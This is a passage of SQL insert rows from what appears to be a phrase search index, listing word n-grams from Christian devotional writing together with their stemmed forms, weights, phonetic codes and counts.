(150904, 'we need to', 'we need to', 0, 1, 1.3333, 'W530', 2, '*'),
(150905, 'we\'ve dealt', 'we dealt', 0, 1, 1.3667, 'W1343', 2, '*'),
(150906, 'we\'ve dealt with', 'we dealt with', 0, 1, 1.5333, 'W1343', 2, '*'),
(150907, 'wear', 'wear', 0, 0, 0.2667, 'W600', 3, '*'),
(150908, 'wear must', 'wear must', 0, 1, 1.3, 'W6523', 2, '*'),
(150909, 'wear must represent', 'wear must represent', 0, 1, 1.6333, 'W6523616253', 2, '*'),
(150910, 'were important', 'were important', 0, 1, 1.4667, 'W6516353', 2, '*'),
(150911, 'were important they', 'were important they', 0, 1, 1.6333, 'W6516353', 2, '*'),
(150912, 'were in', 'were in', 0, 1, 1.2333, 'W650', 3, '*'),
(150913, 'were in no', 'were in no', 0, 1, 1.3333, 'W650', 2, '*'),
(150914, 'what god has', 'what god has', 0, 1, 1.4, 'W3232', 5, '*'),
(150915, 'what it', 'what it', 0, 1, 1.2333, 'W300', 3, '*'),
(150916, 'what it means', 'what it means', 0, 1, 1.4333, 'W352', 2, '*'),
(150917, 'what you probably', 'what you probably', 0, 1, 1.5667, 'W31614', 2, '*'),
(150918, 'what you say', 'what you say', 0, 1, 1.4, 'W320', 2, '*'),
(150919, 'when all', 'when all', 0, 1, 1.2667, 'W540', 2, '*'),
(150920, 'when all it', 'when all it', 0, 1, 1.3667, 'W543', 2, '*'),
(150921, 'when god created', 'when god created', 0, 1, 1.5333, 'W523263', 2, '*'),
(150922, 'when god gave', 'when god gave', 0, 1, 1.4333, 'W52321', 2, '*'),
(150923, 'when it comes', 'when it comes', 0, 1, 1.4333, 'W53252', 3, '*'),
(150924, 'when martha', 'when martha', 0, 1, 1.3667, 'W563', 2, '*'),
(150925, 'when martha was', 'when martha was', 0, 1, 1.5, 'W5632', 2, '*'),
(150926, 'which was', 'which was', 0, 1, 1.3, 'W200', 3, '*'),
(150927, 'which was listening', 'which was listening', 0, 1, 1.6333, 'W242352', 2, '*'),
(150928, 'which you', 'which you', 0, 1, 1.3, 'W200', 4, '*'),
(150929, 'which you differentiate', 'which you differentiate', 0, 1, 1.7667, 'W231653', 2, '*'),
(150930, 'which you have', 'which you have', 0, 1, 1.4667, 'W210', 2, '*'),
(150931, 'while mary', 'while mary', 0, 1, 1.3333, 'W456', 2, '*'),
(150932, 'while mary took', 'while mary took', 0, 1, 1.5, 'W45632', 2, '*'),
(150933, 'who practice', 'who practice', 0, 1, 1.4, 'W16232', 2, '*'),
(150934, 'who practice religion', 'who practice religion', 0, 1, 1.7, 'W162326425', 2, '*'),
(150935, 'who would', 'who would', 0, 1, 1.3, 'W430', 2, '*'),
(150936, 'who would have', 'who would have', 0, 1, 1.4667, 'W431', 2, '*'),
(150937, 'will happen', 'will happen', 0, 1, 1.3667, 'W415', 3, '*'),
(150938, 'will happen in', 'will happen in', 0, 1, 1.4667, 'W415', 2, '*'),
(150939, 'will make', 'will make', 0, 1, 1.3, 'W452', 5, '*'),
(150940, 'will make men', 'will make men', 0, 1, 1.4333, 'W4525', 2, '*'),
(150941, 'with any', 'with any', 0, 1, 1.2667, 'W350', 2, '*'),
(150942, 'with any sense', 'with any sense', 0, 1, 1.4667, 'W35252', 2, '*'),
(150943, 'with christ', 'with christ', 0, 1, 1.3667, 'W32623', 3, '*'),
(150944, 'with christ worship', 'with christ worship', 0, 1, 1.6333, 'W32623621', 2, '*'),
(150945, 'with god as', 'with god as', 0, 1, 1.3667, 'W3232', 2, '*'),
(150946, 'with god when', 'with god when', 0, 1, 1.4333, 'W3235', 2, '*'),
(150947, 'with him out', 'with him out', 0, 1, 1.4, 'W353', 2, '*'),
(150948, 'with him the', 'with him the', 0, 1, 1.4, 'W353', 3, '*'),
(150949, 'with how', 'with how', 0, 1, 1.2667, 'W300', 2, '*'),
(150950, 'with how god', 'with how god', 0, 1, 1.4, 'W323', 2, '*'),
(150951, 'with love', 'with love', 0, 1, 1.3, 'W341', 2, '*'),
(150952, 'with love and', 'with love and', 0, 1, 1.4333, 'W34153', 2, '*'),
(150953, 'with man', 'with man', 0, 1, 1.2667, 'W350', 3, '*'),
(150954, 'with man in', 'with man in', 0, 1, 1.3667, 'W350', 2, '*'),
(150955, 'with no', 'with no', 0, 1, 1.2333, 'W350', 5, '*'),
(150956, 'with no heartfelt', 'with no heartfelt', 0, 1, 1.5667, 'W3563143', 2, '*'),
(150957, 'with people in', 'with people in', 0, 1, 1.4667, 'W3145', 2, '*'),
(150958, 'with practices', 'with practices', 0, 1, 1.4667, 'W316232', 2, '*'),
(150959, 'with practices that', 'with practices that', 0, 1, 1.6333, 'W3162323', 2, '*'),
(150960, 'with respect', 'with respect', 0, 1, 1.4, 'W362123', 2, '*'),
(150961, 'with respect and', 'with respect and', 0, 1, 1.5333, 'W36212353', 2, '*'),
(150962, 'with the devil', 'with the devil', 0, 1, 1.4667, 'W314', 3, '*'),
(150963, 'with the spiritual', 'with the spiritual', 0, 1, 1.6, 'W321634', 2, '*'),
(150964, 'women any', 'women any', 0, 1, 1.3, 'W500', 2, '*'),
(150965, 'women any dress', 'women any dress', 0, 1, 1.5, 'W5362', 2, '*'),
(150966, 'women but', 'women but', 0, 1, 1.3, 'W513', 2, '*'),
(150967, 'women but to', 'women but to', 0, 1, 1.4, 'W513', 2, '*'),
(150968, 'won\'t', 'won', 0, 0, 0.3333, 'W530', 5, '*'),
(150969, 'won\'t be', 'won be', 0, 1, 1.2667, 'W531', 2, '*'),
(150970, 'won\'t be able', 'won be able', 0, 1, 1.4333, 'W5314', 2, '*'),
(150971, 'word and', 'word and', 0, 1, 1.2667, 'W6353', 7, '*'),
(150972, 'word and god', 'word and god', 0, 1, 1.4, 'W635323', 2, '*'),
(150973, 'words as', 'word as', 0, 1, 1.2667, 'W632', 3, '*'),
(150974, 'words as a', 'word as a', 0, 1, 1.3333, 'W632', 2, '*'),
(150975, 'words closely', 'word closely', 0, 1, 1.4333, 'W632424', 2, '*'),
(150976, 'words closely as', 'word closely as', 0, 1, 1.5333, 'W6324242', 2, '*'),
(150977, 'words determine', 'word determine', 0, 1, 1.5, 'W632365', 2, '*'),
(150978, 'words determine the', 'word determine the', 0, 1, 1.6333, 'W6323653', 2, '*'),
(150979, 'words that worldly', 'word that worldly', 0, 1, 1.6, 'W63236434', 1, '*'),
(150980, 'words to', 'word to', 0, 1, 1.2667, 'W6323', 2, '*'),
(150981, 'words to improve', 'word to improve', 0, 1, 1.5333, 'W63235161', 2, '*'),
(150982, 'work to', 'work to', 0, 1, 1.2333, 'W623', 3, '*'),
(150983, 'work to do', 'work to do', 0, 1, 1.3333, 'W623', 2, '*'),
(150984, 'world and show', 'world and show', 0, 1, 1.4667, 'W643532', 2, '*'),
(150985, 'world take', 'world take', 0, 1, 1.3333, 'W6432', 2, '*'),
(150986, 'world take note', 'world take note', 0, 1, 1.5, 'W643253', 2, '*'),
(150987, 'world your', 'world your', 0, 1, 1.3333, 'W6436', 2, '*'),
(150988, 'world your words', 'world your words', 0, 1, 1.5333, 'W643632', 2, '*'),
(150989, 'worldly', 'worldli', 0, 0, 0.4667, 'W6434', 5, '*'),
(150990, 'worldly people', 'worldli people', 0, 1, 1.4667, 'W643414', 2, '*'),
(150991, 'worldly people use', 'worldli people use', 0, 1, 1.6, 'W6434142', 2, '*'),
(150992, 'worldly ways', 'worldli ways', 0, 1, 1.4, 'W64342', 2, '*'),
(150993, 'worldly ways that', 'worldli ways that', 0, 1, 1.5667, 'W643423', 2, '*'),
(150994, 'worship', 'worship', 0, 0, 0.4667, 'W621', 8, '*'),
(150995, 'worship god', 'worship god', 0, 1, 1.3667, 'W62123', 3, '*'),
(150996, 'worship god in', 'worship god in', 0, 1, 1.4667, 'W621235', 2, '*'),
(150997, 'would behave', 'would behave', 0, 1, 1.4, 'W431', 2, '*'),
(150998, 'would behave implies', 'would behave implies', 0, 1, 1.6667, 'W4315142', 2, '*'),
(150999, 'would behave in', 'would behave in', 0, 1, 1.5, 'W4315', 2, '*'),
(151000, 'would have', 'would have', 0, 1, 1.3333, 'W431', 6, '*'),
(151001, 'would have eaten', 'would have eaten', 0, 1, 1.5333, 'W43135', 2, '*'),
(151002, 'would have had', 'would have had', 0, 1, 1.4667, 'W4313', 2, '*'),
(151003, 'would have missed', 'would have missed', 0, 1, 1.5667, 'W431523', 2, '*'),
(151004, 'would have personal', 'would have personal', 0, 1, 1.6333, 'W4316254', 2, '*'),
(151005, 'wow', 'wow', 0, 0, 0.2, 'W000', 2, '*'),
(151006, 'wow that', 'wow that', 0, 1, 1.2667, 'W300', 2, '*'),
(151007, 'wow that means', 'wow that means', 0, 1, 1.4667, 'W352', 2, '*'),
(151008, 'wretched', 'wretch', 0, 0, 0.5333, 'W6323', 2, '*'),
(151009, 'wretched god', 'wretch god', 0, 1, 1.4, 'W632323', 2, '*'),
(151010, 'wretched god is', 'wretch god is', 0, 1, 1.5, 'W6323232', 2, '*'),
(151045, 'you of', 'you of', 0, 1, 1.2, 'Y100', 4, '*'),
(151070, 'you would', 'you would', 0, 1, 1.3, 'Y430', 4, '*'),
(156971, 'a body', 'a body', 0, 1, 1.2, 'A130', 3, '*'),
(156980, 'a holy', 'a holy', 0, 1, 1.2, 'A400', 2, '*'),
(156983, 'a man that', 'a man that', 0, 1, 1.3333, 'A530', 2, '*'),
(156996, 'acts 5', 'act 5', 0, 1, 1.2, 'A232', 2, '*'),
(156998, 'advance', 'advanc', 0, 0, 0.4667, 'A3152', 2, '*'),
(157018, 'and it shall', 'and it shall', 0, 1, 1.4, 'A5324', 5, '*'),
(157021, 'and open', 'and open', 0, 1, 1.2667, 'A5315', 3, '*'),
(157033, 'and will', 'and will', 0, 1, 1.2667, 'A534', 2, '*'),
(157037, 'are living', 'ar living', 0, 1, 1.3333, 'A64152', 3, '*'),
(157051, 'assignments in', 'assign in', 0, 1, 1.4667, 'A25325', 2, '*'),
(157071, 'be well', 'be well', 0, 1, 1.2333, 'B400', 6, '*'),
(157072, 'be well with', 'be well with', 0, 1, 1.4, 'B430', 6, '*'),
(157083, 'being given', 'be given', 0, 1, 1.3667, 'B5215', 2, '*'),
(157085, 'believed', 'believ', 0, 0, 0.5333, 'B413', 2, '*'),
(157099, 'but because', 'but because', 0, 1, 1.3667, 'B312', 4, '*'),
(157100, 'but because of', 'but because of', 0, 1, 1.4667, 'B3121', 2, '*'),
(157101, 'but god', 'but god', 0, 1, 1.2333, 'B323', 3, '*'),
(157102, 'but god can', 'but god can', 0, 1, 1.3667, 'B32325', 2, '*'),
(157103, 'but god was', 'but god was', 0, 1, 1.3667, 'B3232', 2, '*'),
(157105, 'but when', 'but when', 0, 1, 1.2667, 'B350', 2, '*'),
(157106, 'but when they', 'but when they', 0, 1, 1.4333, 'B353', 2, '*'),
(157107, 'call for', 'call for', 0, 1, 1.2667, 'C416', 4, '*'),
(157111, 'can make you', 'can make you', 0, 1, 1.4, 'C520', 2, '*'),
(157127, 'christians in', 'christian in', 0, 1, 1.4333, 'C623525', 2, '*'),
(157149, 'come in', 'come in', 0, 1, 1.2333, 'C500', 2, '*'),
(157166, 'could not', 'could not', 0, 1, 1.3, 'C4353', 3, '*'),
(157169, 'cover', 'cover', 0, 0, 0.3333, 'C160', 2, '*'),
(157172, 'covered', 'cover', 0, 0, 0.4667, 'C163', 2, '*'),
(157183, 'described', 'describ', 0, 0, 0.6, 'D2613', 2, '*'),
(157190, 'devil has', 'devil has', 0, 1, 1.3, 'D142', 4, '*'),
(157197, 'divine instructions', 'divin instructions', 0, 1, 1.6333, 'D152362352', 3, '*'),
(157215, 'earthly', 'earthli', 0, 0, 0.4667, 'E634', 2, '*'),
(157239, 'feel', 'feel', 0, 0, 0.2667, 'F400', 3, '*'),
(157248, 'for god\'s', 'for god', 0, 1, 1.3, 'F6232', 3, '*'),
(157252, 'for your life', 'for your life', 0, 1, 1.4333, 'F641', 6, '*'),
(157263, 'fulfilling', 'fulfil', 0, 0, 0.6667, 'F41452', 2, '*'),
(157266, 'garden', 'garden', 0, 0, 0.4, 'G635', 2, '*'),
(157269, 'gen', 'gen', 0, 0, 0.2, 'G500', 4, '*'),
(157270, 'gen 2', 'gen 2', 0, 1, 1.1667, 'G500', 2, '*'),
(157280, 'god are', 'god are', 0, 1, 1.2333, 'G360', 2, '*'),
(157282, 'god can', 'god can', 0, 1, 1.2333, 'G325', 3, '*'),
(157291, 'god\'s call for', 'god call for', 0, 1, 1.4667, 'G32416', 3, '*'),
(157296, 'god\'s word and', 'god word and', 0, 1, 1.4667, 'G326353', 4, '*'),
(157355, 'his voice', 'hi voice', 0, 1, 1.3, 'H212', 2, '*'),
(157356, 'his voice and', 'hi voice and', 0, 1, 1.4333, 'H21253', 2, '*'),
(157364, 'how many', 'how many', 0, 1, 1.2667, 'H500', 3, '*'),
(157366, 'how much of', 'how much of', 0, 1, 1.3667, 'H521', 2, '*'),
(157381, 'in number', 'in number', 0, 1, 1.3, 'I516', 3, '*'),
(157393, 'in the garden', 'in the garden', 0, 1, 1.4333, 'I532635', 2, '*'),
(157411, 'is being', 'is being', 0, 1, 1.2667, 'I2152', 4, '*'),
(157426, 'is spiritual', 'is spiritual', 0, 1, 1.4, 'I21634', 2, '*'),
(157435, 'it shall be', 'it shall be', 0, 1, 1.3667, 'I3241', 5, '*'),
(157452, 'judgment', 'judgment', 0, 0, 0.5333, 'J3253', 3, '*'),
(157470, 'know that god', 'know that god', 0, 1, 1.4333, 'K5323', 2, '*'),
(157491, 'life they', 'life they', 0, 1, 1.3, 'L130', 2, '*'),
(157496, 'lives today', 'live today', 0, 1, 1.3667, 'L123', 2, '*'),
(157513, 'lost', 'lost', 0, 0, 0.2667, 'L230', 4, '*'),
(157516, 'lost the', 'lost the', 0, 1, 1.2667, 'L230', 2, '*'),
(157519, 'loves', 'love', 0, 0, 0.3333, 'L120', 3, '*'),
(157532, 'make them', 'make them', 0, 1, 1.3, 'M235', 3, '*'),
(157535, 'man that', 'man that', 0, 1, 1.2667, 'M300', 2, '*'),
(157561, 'much of', 'much of', 0, 1, 1.2333, 'M210', 2, '*'),
(157575, 'night', 'night', 0, 0, 0.3333, 'N230', 7, '*'),
(157576, 'night is', 'night is', 0, 1, 1.2667, 'N232', 3, '*'),
(157599, 'number', 'number', 0, 0, 0.4, 'N160', 3, '*'),
(157611, 'of god are', 'of god are', 0, 1, 1.3333, 'O1236', 2, '*'),
(157622, 'of such', 'of such', 0, 1, 1.2333, 'O120', 2, '*'),
(157637, 'only a', 'onli a', 0, 1, 1.2, 'O540', 2, '*'),
(157649, 'opens', 'open', 0, 0, 0.3333, 'O152', 3, '*'),
(157655, 'or in', 'or in', 0, 1, 1.1667, 'O650', 4, '*'),
(157659, 'our lives', 'our lives', 0, 1, 1.3, 'O6412', 4, '*'),
(157691, 'problem is', 'problem is', 0, 1, 1.3333, 'P61452', 3, '*'),
(157718, 'resources', 'resourc', 0, 0, 0.6, 'R262', 5, '*'),
(157759, 'shall be well', 'shall be well', 0, 1, 1.4333, 'S414', 5, '*'),
(157767, 'spending', 'spend', 0, 0, 0.5333, 'S15352', 2, '*'),
(157768, 'spending time', 'spend time', 0, 1, 1.4333, 'S1535235', 2, '*'),
(157824, 'that have', 'that have', 0, 1, 1.3, 'T100', 4, '*'),
(157826, 'that the devil', 'that the devil', 0, 1, 1.4667, 'T140', 5, '*'),
(157840, 'the devil has', 'the devil has', 0, 1, 1.4333, 'T142', 4, '*'),
(157846, 'the garden', 'the garden', 0, 1, 1.3333, 'T2635', 2, '*'),
(157849, 'the great', 'the great', 0, 1, 1.3, 'T263', 3, '*'),
(157856, 'the night', 'the night', 0, 1, 1.3, 'T523', 4, '*'),
(157857, 'the night is', 'the night is', 0, 1, 1.4, 'T5232', 3, '*'),
(157863, 'the true', 'the true', 0, 1, 1.2667, 'T600', 2, '*'),
(157911, 'this because', 'thi because', 0, 1, 1.4, 'T212', 2, '*'),
(157923, 'time in', 'time in', 0, 1, 1.2333, 'T500', 3, '*'),
(157927, 'to a man', 'to a man', 0, 1, 1.2667, 'T500', 3, '*'),
(157956, 'today and', 'todai and', 0, 1, 1.3, 'T530', 5, '*'),
(157976, 'up in', 'up in', 0, 1, 1.1667, 'U150', 6, '*'),
(157992, 'voice', 'voic', 0, 0, 0.3333, 'V200', 7, '*'),
(157993, 'voice and', 'voic and', 0, 1, 1.3, 'V253', 3, '*'),
(157995, 'vs', 'vs', 0, 0, 0.1333, 'V200', 3, '*'),
(158012, 'well with', 'well with', 0, 1, 1.3, 'W430', 6, '*'),
(158013, 'well with you', 'well with you', 0, 1, 1.4333, 'W430', 5, '*'),
(158020, 'when no', 'when no', 0, 1, 1.2333, 'W500', 2, '*'),
(158022, 'when they', 'when they', 0, 1, 1.3, 'W530', 6, '*'),
(158040, 'with god and', 'with god and', 0, 1, 1.4, 'W32353', 4, '*'),
(158083, 'your life is', 'your life is', 0, 1, 1.4, 'Y6412', 4, '*'),
(158958, 'a school', 'a school', 0, 1, 1.2667, 'A240', 2, '*'),
(158960, 'a time', 'a time', 0, 1, 1.2, 'A350', 5, '*'),
(158967, 'add', 'add', 0, 0, 0.2, 'A300', 3, '*'),
(158970, 'adds', 'add', 0, 0, 0.2667, 'A320', 4, '*'),
(158971, 'adds to', 'add to', 0, 1, 1.2333, 'A323', 3, '*'),
(158972, 'adds to your', 'add to your', 0, 1, 1.4, 'A3236', 3, '*'),
(158973, 'ahead', 'ahead', 0, 0, 0.3333, 'A300', 3, '*'),
(158996, 'and some', 'and some', 0, 1, 1.2667, 'A5325', 2, '*'),
(159001, 'and thy', 'and thy', 0, 1, 1.2333, 'A530', 2, '*'),
(159006, 'and what', 'and what', 0, 1, 1.2667, 'A530', 2, '*'),
(159038, 'be a time', 'be a time', 0, 1, 1.3, 'B350', 2, '*'),
(159058, 'but it is', 'but it is', 0, 1, 1.3, 'B320', 5, '*'),
(159061, 'but the lord', 'but the lord', 0, 1, 1.4, 'B3463', 2, '*'),
(159077, 'can add', 'can add', 0, 1, 1.2333, 'C530', 2, '*'),
(159081, 'can only', 'can only', 0, 1, 1.2667, 'C540', 2, '*'),
(159100, 'come to the', 'come to the', 0, 1, 1.3667, 'C530', 3, '*'),
(159113, 'days ahead', 'dai ahead', 0, 1, 1.3333, 'D230', 2, '*'),
(159140, 'determines the', 'determin the', 0, 1, 1.4667, 'D6523', 2, '*'),
(159147, 'do at', 'do at', 0, 1, 1.1667, 'D000', 3, '*'),
(159163, 'egypt but', 'egypt but', 0, 1, 1.3, 'E21313', 3, '*'),
(159167, 'egyptian', 'egyptian', 0, 0, 0.5333, 'E2135', 2, '*'),
(159184, 'exactly', 'exactli', 0, 0, 0.4667, 'E234', 2, '*'),
(159192, 'fail in', 'fail in', 0, 1, 1.2333, 'F450', 2, '*'),
(159226, 'father\'s heart 12', 'father heart 12', 0, 1, 1.5667, 'F36263', 2, '*'),
(159248, 'get into', 'get into', 0, 1, 1.2667, 'G353', 2, '*'),
(159260, 'go over', 'go over', 0, 1, 1.2333, 'G160', 2, '*'),
(159280, 'handling', 'handl', 0, 0, 0.5333, 'H53452', 2, '*'),
(159290, 'heart 12', 'heart 12', 0, 1, 1.2667, 'H630', 2, '*'),
(159305, 'in egypt', 'in egypt', 0, 1, 1.2667, 'I5213', 3, '*'),
(159306, 'in egypt but', 'in egypt but', 0, 1, 1.4, 'I521313', 2, '*'),
(159313, 'in life it', 'in life it', 0, 1, 1.3333, 'I5413', 2, '*'),
(159358, 'it looks', 'it looks', 0, 1, 1.2667, 'I342', 3, '*'),
(159359, 'it looks like', 'it looks like', 0, 1, 1.4333, 'I34242', 3, '*'),
(159377, 'know the', 'know the', 0, 1, 1.2667, 'K530', 4, '*'),
(159382, 'life has', 'life has', 0, 1, 1.2667, 'L120', 2, '*'),
(159384, 'life it', 'life it', 0, 1, 1.2333, 'L130', 5, '*'),
(159385, 'life it is', 'life it is', 0, 1, 1.3333, 'L132', 4, '*'),
(159386, 'life will', 'life will', 0, 1, 1.3, 'L140', 4, '*'),
(159404, 'looks', 'look', 0, 0, 0.3333, 'L200', 4, '*'),
(159405, 'looks like', 'look like', 0, 1, 1.3333, 'L242', 3, '*'),
(159409, 'lord shall', 'lord shall', 0, 1, 1.3333, 'L6324', 2, '*'),
(159410, 'lord shall be', 'lord shall be', 0, 1, 1.4333, 'L63241', 2, '*'),
(159412, 'meet you', 'meet you', 0, 1, 1.2667, 'M300', 2, '*'),
(159414, 'men are', 'men are', 0, 1, 1.2333, 'M600', 3, '*'),
(159416, 'men some', 'men some', 0, 1, 1.2667, 'M250', 2, '*'),
(159418, 'mess', 'mess', 0, 0, 0.2667, 'M200', 2, '*'),
(159441, 'no more', 'no more', 0, 1, 1.2333, 'N600', 2, '*'),
(159470, 'of the supernatural', 'of the supernatural', 0, 1, 1.6333, 'O132165364', 3, '*'),
(159482, 'otherwise', 'otherwis', 0, 0, 0.6, 'O362', 3, '*'),
(159488, 'over it', 'over it', 0, 1, 1.2333, 'O163', 2, '*'),
(159522, 's heart 12', 's heart 12', 0, 1, 1.3333, 'S630', 2, '*'),
(159530, 'saying this', 'sai this', 0, 1, 1.3667, 'S5232', 3, '*'),
(159531, 'saying this is', 'sai this is', 0, 1, 1.4667, 'S5232', 2, '*'),
(159539, 'separated', 'separ', 0, 0, 0.6, 'S163', 3, '*'),
(159544, 'shall the', 'shall the', 0, 1, 1.3, 'S430', 3, '*'),
(159546, 'side', 'side', 0, 0, 0.2667, 'S300', 3, '*'),
(159557, 'situations and', 'situat and', 0, 1, 1.4667, 'S35253', 3, '*'),
(159580, 'stupid', 'stupid', 0, 0, 0.4, 'S313', 2, '*'),
(159610, 'teaching', 'teach', 0, 0, 0.5333, 'T252', 3, '*'),
(159622, 'that is a', 'that is a', 0, 1, 1.3, 'T200', 3, '*'),
(159638, 'the days', 'the days', 0, 1, 1.2667, 'T200', 3, '*'),
(159639, 'the days ahead', 'the days ahead', 0, 1, 1.4667, 'T230', 2, '*'),
(159644, 'the difference', 'the difference', 0, 1, 1.4667, 'T1652', 4, '*'),
(159650, 'the end', 'the end', 0, 1, 1.2333, 'T530', 3, '*'),
(159660, 'the lord shall', 'the lord shall', 0, 1, 1.4667, 'T46324', 2, '*'),
(159671, 'the supernatural', 'the supernatural', 0, 1, 1.5333, 'T2165364', 3, '*'),
(159676, 'the way of', 'the way of', 0, 1, 1.3333, 'T100', 2, '*'),
(159677, 'thee', 'thee', 0, 0, 0.2667, 'T000', 5, '*'),
(159689, 'these days', 'these days', 0, 1, 1.3333, 'T232', 2, '*'),
(159702, 'thy god', 'thy god', 0, 1, 1.2333, 'T230', 3, '*'),
(159704, 'thy light', 'thy light', 0, 1, 1.3, 'T423', 2, '*'),
(159718, 'to ask', 'to ask', 0, 1, 1.2, 'T200', 3, '*'),
(159719, 'to ask you', 'to ask you', 0, 1, 1.3333, 'T200', 3, '*'),
(159722, 'to do at', 'to do at', 0, 1, 1.2667, 'T000', 3, '*'),
(159725, 'to his children', 'to his children', 0, 1, 1.5, 'T24365', 2, '*'),
(159726, 'to know the', 'to know the', 0, 1, 1.3667, 'T253', 3, '*'),
(159736, 'to tell you', 'to tell you', 0, 1, 1.3667, 'T400', 3, '*'),
(159763, 'us for', 'us for', 0, 1, 1.2, 'U216', 2, '*'),
(159766, 'used to', 'us to', 0, 1, 1.2333, 'U230', 4, '*'),
(159772, 'very well', 'veri well', 0, 1, 1.3, 'V640', 3, '*'),
(159781, 'way of', 'wai of', 0, 1, 1.2, 'W100', 4, '*'),
(159792, 'what can', 'what can', 0, 1, 1.2667, 'W325', 2, '*'),
(159796, 'what they', 'what they', 0, 1, 1.3, 'W300', 2, '*'),
(159809, 'when you get', 'when you get', 0, 1, 1.4, 'W523', 3, '*'),
(159815, 'will go', 'will go', 0, 1, 1.2333, 'W420', 5, '*'),
(159825, 'wise', 'wise', 0, 0, 0.2667, 'W200', 3, '*'),
(159853, 'you get into', 'you get into', 0, 1, 1.4, 'Y2353', 2, '*'),
(159866, 'you to take', 'you to take', 0, 1, 1.3667, 'Y320', 2, '*'),
(159872, 'you you', 'you you', 0, 1, 1.2333, 'Y000', 5, '*'),
(159890, 'zone', 'zone', 0, 0, 0.2667, 'Z500', 2, '*'),
(163056, '4 says', '4 says', 0, 1, 1.2, 'S000', 2, '*'),
(163066, 'a man with', 'a man with', 0, 1, 1.3333, 'A530', 3, '*'),
(163072, 'ability to', 'abil to', 0, 1, 1.3333, 'A143', 6, '*'),
(163078, 'all the difference', 'all the difference', 0, 1, 1.6, 'A431652', 3, '*'),
(163079, 'allocations', 'alloc', 0, 0, 0.7333, 'A42352', 2, '*'),
(163086, 'always in', 'alwai in', 0, 1, 1.3, 'A425', 2, '*'),
(163112, 'and thine', 'and thine', 0, 1, 1.3, 'A535', 2, '*'),
(163118, 'answered', 'answer', 0, 0, 0.5333, 'A5263', 2, '*'),
(163136, 'because they are', 'becaus they are', 0, 1, 1.5333, 'B236', 2, '*'),
(163137, 'before them', 'befor them', 0, 1, 1.3667, 'B635', 2, '*'),
(163146, 'brings', 'bring', 0, 0, 0.4, 'B652', 6, '*'),
(163150, 'but will', 'but will', 0, 1, 1.2667, 'B340', 2, '*'),
(163173, 'desire and', 'desir and', 0, 1, 1.3333, 'D2653', 2, '*'),
(163182, 'ears', 'ear', 0, 0, 0.2667, 'E620', 2, '*'),
(163193, 'flee', 'flee', 0, 0, 0.2667, 'F400', 2, '*'),
(163200, 'for they', 'for they', 0, 1, 1.2667, 'F630', 3, '*'),
(163203, 'forth his', 'forth his', 0, 1, 1.3, 'F632', 2, '*'),
(163207, 'from him', 'from him', 0, 1, 1.2667, 'F650', 3, '*'),
(163215, 'go in', 'go in', 0, 1, 1.1667, 'G500', 2, '*'),
(163216, 'go in the', 'go in the', 0, 1, 1.3, 'G530', 2, '*'),
(163218, 'god is always', 'god is always', 0, 1, 1.4333, 'G3242', 3, '*'),
(163221, 'god told', 'god told', 0, 1, 1.2667, 'G343', 2, '*'),
(163222, 'god told me', 'god told me', 0, 1, 1.3667, 'G3435', 2, '*'),
(163233, 'guarantees', 'guarante', 0, 0, 0.6667, 'G6532', 2, '*'),
(163239, 'habit', 'habit', 0, 0, 0.3333, 'H130', 3, '*'),
(163245, 'has never', 'ha never', 0, 1, 1.3, 'H2516', 3, '*'),
(163247, 'he answered', 'he answered', 0, 1, 1.3667, 'H5263', 2, '*'),
(163253, 'he will be', 'he will be', 0, 1, 1.3333, 'H410', 2, '*'),
(163303, 'in life and', 'in life and', 0, 1, 1.3667, 'I54153', 4, '*'),
(163310, 'into our', 'into our', 0, 1, 1.2667, 'I536', 2, '*'),
(163311, 'into our lives', 'into our lives', 0, 1, 1.4667, 'I536412', 2, '*'),
(163315, 'is god\'s', 'is god', 0, 1, 1.2667, 'I232', 3, '*'),
(163355, 'life god', 'life god', 0, 1, 1.2667, 'L123', 3, '*'),
(163357, 'life let', 'life let', 0, 1, 1.2667, 'L143', 4, '*'),
(163393, 'lose the', 'lose the', 0, 1, 1.2667, 'L230', 2, '*'),
(163400, 'man with', 'man with', 0, 1, 1.2667, 'M300', 3, '*'),
(163404, 'master and', 'master and', 0, 1, 1.3333, 'M23653', 3, '*'),
(163512, 'recognize', 'recogn', 0, 0, 0.6, 'R252', 3, '*'),
(163517, 'respond', 'respond', 0, 0, 0.4667, 'R2153', 3, '*'),
(163523, 'safety', 'safeti', 0, 0, 0.4, 'S130', 2, '*'),
(163531, 'sam', 'sam', 0, 0, 0.2, 'S500', 3, '*'),
(163534, 'samuel and', 'samuel and', 0, 1, 1.3333, 'S5453', 2, '*'),
(163545, 'says “the', 'sai “the', 0, 1, 1.3, 'S300', 2, '*'),
(163552, 'see men', 'see men', 0, 1, 1.2333, 'S500', 3, '*'),
(163556, 'send', 'send', 0, 0, 0.2667, 'S530', 4, '*'),
(163563, 'shall i', 'shall i', 0, 1, 1.2333, 'S400', 3, '*'),
(163587, 'started', 'start', 0, 0, 0.4667, 'S363', 3, '*'),
(163610, 'that comes', 'that comes', 0, 1, 1.3333, 'T252', 4, '*'),
(163625, 'the ability', 'the ability', 0, 1, 1.3667, 'T143', 5, '*'),
(163646, 'the voice', 'the voice', 0, 1, 1.3, 'T120', 5, '*'),
(163647, 'the voice of', 'the voice of', 0, 1, 1.4, 'T121', 5, '*'),
(163655, 'they are not', 'thei are not', 0, 1, 1.4, 'T653', 2, '*'),
(163656, 'they know', 'thei know', 0, 1, 1.3, 'T250', 3, '*'),
(163686, 'to the right', 'to the right', 0, 1, 1.4, 'T623', 3, '*'),
(163690, 'told me', 'told me', 0, 1, 1.2333, 'T435', 6, '*'),
(163695, 'up i', 'up i', 0, 1, 1.1333, 'U100', 2, '*'),
(163700, 'us the', 'us the', 0, 1, 1.2, 'U230', 3, '*'),
(163710, 'voice of', 'voic of', 0, 1, 1.2667, 'V210', 5, '*'),
(163713, 'voice of the', 'voic of the', 0, 1, 1.4, 'V213', 4, '*'),
(163738, 'went', 'went', 0, 0, 0.2667, 'W530', 8, '*'),
(163792, '“the', '“the', 0, 0, 0.2667, '“300', 2, '*'),
(167368, 'god may', 'god may', 0, 1, 1.2333, 'G350', 3, '*'),
(167797, 'you of your', 'you of your', 0, 1, 1.3667, 'Y160', 3, '*'),
(168181, '3-6', '3-6', 0, 0, 0.3, '', 2, '*'),
(168187, '4 7', '4 7', 0, 1, 1.1, '', 3, '*'),
(168205, '8-9', '8-9', 0, 0, 0.3, '', 2, '*'),
(168232, 'a sense', 'a sense', 0, 1, 1.2333, 'A252', 3, '*'),
(168233, 'a sense of', 'a sense of', 0, 1, 1.3333, 'A2521', 3, '*'),
(168234, 'a set', 'a set', 0, 1, 1.1667, 'A230', 3, '*'),
